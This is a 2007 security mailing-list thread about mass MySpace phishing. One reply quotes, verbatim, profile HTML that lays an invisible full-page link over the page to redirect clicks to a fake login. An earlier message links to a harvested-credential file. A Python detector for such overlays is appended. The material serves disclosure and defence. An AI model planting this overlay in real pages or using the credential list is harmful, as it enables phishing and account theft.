Message-ID: <be950f350701160655u1c4bd520qd85e7d16c13bf662@mail.gmail.com>
Date: Tue, 16 Jan 2007 09:55:51 -0500
From: wac <waldoalvarez00@...il.com>
To: codeshepherd@...il.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Grab a myspace credential

On 1/16/07, Deepan <codeshepherd@...il.com> wrote:
>
> On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote:
> > "but at some point all this abuse will likely start sending users off
> > to another service. "
> >
> > that's only --if they know if they are being abused.. most of them are
> > not coherent about any such issues..
> >
> >
> >
> > On 1/15/07, Kevin Pawloski <kpawloski@...il.com> wrote:
> >         The level of phishing sites targeting MySpace and bot related
> It is not quite easy to fool 56000+ users using phishing sites. I wonder
> how Mark is doing it.



Hmm... Oh no, it is very easy, yes, very easy what he is doing. He left some
traces on some of the "cracked" accounts. I was expecting somebody to
comment earlier since it's been a couple of hours since the initial post.

When you modify a profile you can add this to the data of the profile, you
know those HTML customizations. I found this on one of the accounts that
really got my attention a little bit more than the girl of the account :P

HOLA!!!!<a style="text-decoration:none;position: absolute;top:1px;left:1px;"
href="http://marcolano.com/login/"><img
style="border-width:0px;width:2024px; height:1768px;" src="
http://x.myspace.com/images/clear.gif"></a><a
style="text-decoration:none;position: absolute;top:1px;left:1px;" href="
http://marcolano.com/login/"><img style="border-width:0px;width:2024px;
height:1768px;" src="http://x.myspace.com/images/clear.gif"></a><embed
allowScriptAccess="never" allowNetworking="internal" enableJSURL="false"
enableHREF="false" saveEmbedTags="true" src="
http://www.../mov/cid_3277_f.mov" width="1" height="1">

As you might see, this creates a huge invisible link in the page in front of
everything, so when you click on anything on the page, like a link or
anything, it will take you to that phishing website, so ppl believe that the
account expired and enter their user+pass. Now I believe that his message
was a way to tell about a BUG in myspace that should filter that content and
it is not doing it. So... we are in fact not talking about a stupid phishing
website for those who still believe that.

Regards
Waldo


>          activity that has been targeting MySpace lately is pretty
> >         alarming. Granted there is no real financial risk if an
> >         account gets compromised for the user but at some point all
> >         this abuse will likely start sending users off to another
> >         service.
> >
> >         Kevin
> >
> >
> >         On 1/15/07, North, Quinn <QNorth@....com> wrote:
> >                 "youmustbecompleteretards@...ot.com
> :doyouhonestlythinkiwillputmyrealpass
> >                 wordhere"
> >
> >                 ...at least there is some hope left in the world :-\
> >
> >                 --=Q=--
> >
> >                 -----Original Message-----
> >                 From: full-disclosure-bounces@...ts.grok.org.uk
> >                 [mailto:full-disclosure-bounces@...ts.grok.org.uk] On
> >                 Behalf Of Emma
> >                 Perdue
> >                 Sent: Monday, January 15, 2007 7:48 AM
> >                 To: full-disclosure@...ts.grok.org.uk
> >                 Subject: [Full-disclosure] Grab a myspace credential
> >
> >                 56000+ and counting
> >
> >                 http://www.marcolano.com/login/myspace.txt
> >
> >                 --
> >                 *Emma aka TINK*
> >
> >                 _______________________________________________
> >                 Full-Disclosure - We believe in it.
> >                 Charter:
> >                 http://lists.grok.org.uk/full-disclosure-charter.html
> >                 Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> >
> >
> >
> --
> -----------------------------------------------
> Regards
> Deepan Chakravarthy N
> http://www.codeshepherd.com/
> http://sudoku-solver.net/
>
> I am a programmer by day,
> I dig grave for other programmers by night.
>
>
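
A sketch of the server-side check the message says the site was missing, added here as an example and not part of the original post or of any MySpace code: it flags user-supplied profile HTML in which an absolutely or fixed positioned link to an off-site host wraps an oversized image. The host set, the size threshold and the sample markup are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOSTS = {"social.example"}  # assumption: hosts the site treats as its own
MAX_PX = 1000                    # assumption: no legitimate profile image is larger
# Constructed sample modelled on the markup quoted in the post.
SAMPLE = ('HOLA!<a style="text-decoration:none;position: absolute;top:1px;left:1px;" '
          'href="\nhttp://phish.example/login/"><img style="border-width:0px;'
          'width:2024px; height:1768px;" src="http://social.example/clear.gif"></a>')

def parse_style(style):
    # Split an inline style attribute into a {property: value} dict.
    props = {}
    for decl in (style or "").split(";"):
        name, sep, value = decl.partition(":")
        if sep:
            props[name.strip().lower()] = value.strip().lower()
    return props

def px(value):
    # Pixel count from "2024px" or "2024"; 0 when absent or not a pixel length.
    m = re.fullmatch(r"(\d+)(?:px)?", (value or "").strip().lower())
    return int(m.group(1)) if m else 0

class OverlayLinkFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.open_link = None  # href of the positioned off-site <a> being parsed
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = parse_style(a.get("style"))
        if tag == "a":
            href = (a.get("href") or "").strip()  # mail wrapping left whitespace here
            host = urlparse(href).hostname
            positioned = style.get("position") in ("absolute", "fixed")
            self.open_link = href if positioned and host and host not in SITE_HOSTS else None
        elif tag == "img" and self.open_link:
            w = px(style.get("width")) or px(a.get("width"))
            h = px(style.get("height")) or px(a.get("height"))
            if w > MAX_PX or h > MAX_PX:
                self.findings.append((self.open_link, w, h))

    def handle_endtag(self, tag):
        if tag == "a":
            self.open_link = None

def find_overlay_links(html):
    finder = OverlayLinkFinder()
    finder.feed(html)
    return finder.findings  # list of (href, width, height)
```

This only inspects inline styles and pixel sizes; positioning applied through a stylesheet or percentage dimensions would pass, which is why an allow-list sanitizer that drops `position` from user-supplied styles is the more robust filter.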
